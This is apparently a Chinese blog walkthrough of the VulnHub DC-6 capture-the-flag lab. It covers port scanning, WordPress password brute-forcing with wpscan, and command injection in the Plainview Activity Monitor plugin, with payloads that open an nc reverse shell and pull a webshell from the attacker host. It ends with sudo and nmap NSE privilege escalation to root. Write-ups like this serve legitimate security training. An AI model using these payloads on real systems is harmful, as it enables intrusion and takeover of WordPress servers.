vulnhub-dc6-DC6

最新推荐文章于 2024-10-28 20:32:02 发布

赛博雨天

最新推荐文章于 2024-10-28 20:32:02 发布

阅读量393

点赞数

分类专栏： vulnhub

本文链接：https://blog.youkuaiyun.com/yutianovo/article/details/108943273

版权

vulnhub 专栏收录该内容

23 篇文章

订阅专栏

靶机描述

Blog http://blog.yutian233.xyz/

DESCRIPTION
DC-6 is another purposely built vulnerable lab with the intent of gaining experience in the world of penetration testing.

This isn't an overly difficult challenge so should be great for beginners.

The ultimate goal of this challenge is to get root and to read the one and only flag.

Linux skills and familiarity with the Linux command line are a must, as is some experience with basic penetration testing tools.

For beginners, Google can be of great assistance, but you can always tweet me at @DCAU7 for assistance to get you going again. But take note: I won't give you the answer, instead, I'll give you an idea about how to move forward.

TECHNICAL INFORMATION
DC-6 is a VirtualBox VM built on Debian 64 bit, but there shouldn't be any issues running it on most PCs.

I have tested this on VMWare Player, but if there are any issues running this VM in VMware, have a read through of this.

It is currently configured for Bridged Networking, however, this can be changed to suit your requirements. Networking is configured for DHCP.

Installation is simple - download it, unzip it, and then import it into VirtualBox or VMWare and away you go.

NOTE: You WILL need to edit your hosts file on your pentesting device so that it reads something like:

192.168.0.142 wordy

NOTE: I've used 192.168.0.142 as an example. You'll need to use your normal method to determine the IP address of the VM, and adapt accordingly.

This is VERY important.

And yes, it's another WordPress based VM (although only my second one).

IMPORTANT
While there should be no problems using this VM, by downloading it, you accept full responsibility for any unintentional damage that this VM may cause.

In saying that, there shouldn't be any problems, but I feel the need to throw this out there just in case.

CONTACT
I'm also very interested in hearing how people go about solving these challenges, so if you're up for writing a walkthrough, please do so and send me a link, or alternatively, follow me on Twitter, and DM me (you can unfollow after you've DM'd me if you'd prefer).

I can be contacted via Twitter - @DCAU7

CLUE
OK, this isn't really a clue as such, but more of some "we don't want to spend five years waiting for a certain process to finish" kind of advice for those who just want to get on with the job.

cat /usr/share/wordlists/rockyou.txt | grep k01 > passwords.txt That should save you a few years. ;-)

下载 https://www.vulnhub.com/entry/dc-6,315/

清单

信息搜集
- netdiscover
- namp
利用
- WordPress Plugin Plainview Activity Monitor(2018-15877)
提权
- sudo -l

信息搜集

靶机IP

端口扫描

nmap 192.168.34.155

PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http

接下来，根据靶机描述写入 hosts

制作字典

cat /usr/share/wordlists/rockyou.txt | grep k01 > passwords.txt

wpscan

爆破密码

wpscan --url http://wordy/ -e u --passwords passwords.txt

得到

mark / helpdesk01

使用爆破得到的密码登陆后台

https://www.exploit-db.com/exploits/45274

可以看到有命令注入漏洞

漏洞存在地址 http://localhost:8000/wp-admin/admin.php?page=plainview_activity_monitor&tab=activity_tools

例示
"google.fr| nc -nlvp 127.0.0.1 9999 -e /bin/bash"

Kali

修改webshell 文件

开启监听

网页

这框输入字符数是有限制的，将数字该大一点

输入Payload

google.fr|  curl  http://192.168.34.158/shell.php -o sh.php

http://wordy/wp-admin/sh.php

访问 sh.php 得到shell

移动至 graham

在 /home/mark/stuff 目录下得到用户 graham 用户密码

移动至jens

将 /bin/bash 重定向至 /home/jens/backups.sh

执行 sudo -u jens /home/jens/backups.sh 以获取jens 会话

获取 root

echo "os.execute('/bin/sh')">/tmp/shell.nse

sudo -u root /usr/bin/nmap --script=/tmp/shell.nse